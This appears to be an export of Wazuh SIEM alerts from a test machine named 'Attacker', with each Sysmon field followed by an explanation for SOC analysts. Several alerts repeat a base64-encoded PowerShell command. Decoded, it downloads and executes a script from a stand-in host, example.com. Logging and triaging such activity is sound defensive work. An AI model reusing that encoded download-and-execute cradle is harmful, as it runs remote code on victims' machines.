data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd2d-680a-4c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:40.424+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:40.424+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  59
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534260.1452892
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:37.9972832Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283932
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:37.993 ProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00} ProcessId: 5012 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_esc2b0h1.abg.ps1 CreationUtcTime: 2025-04-24 22:37:37.990 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:37.993
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd30-680a-4e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_esc2b0h1.abg.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:37.990
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:43.367+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:43.367+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  56
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534263.1455657
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:40.4496218Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283985
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:39.119 ProcessGuid: {94294ddc-bd33-680a-510b-000000000e00} ProcessId: 14452 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00} ParentProcessId: 5012 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:39.119
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd33-680a-510b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14452
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd30-680a-4e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:43.394+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:43.394+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  60
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534263.1463724
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:40.7271675Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283987
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:40.661 ProcessGuid: {94294ddc-bd33-680a-510b-000000000e00} ProcessId: 14452 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_11mj13ze.ayt.ps1 CreationUtcTime: 2025-04-24 22:37:40.661 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:40.661
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd33-680a-510b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14452
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_11mj13ze.ayt.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:40.661
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:46.000+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:46.000+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  57
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534266.1466493
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:43.8586741Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284053
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:42.441 ProcessGuid: {94294ddc-bd36-680a-530b-000000000e00} ProcessId: 14008 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd33-680a-510b-000000000e00} ParentProcessId: 14452 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:42.441
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd36-680a-530b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14008
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd33-680a-510b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14452
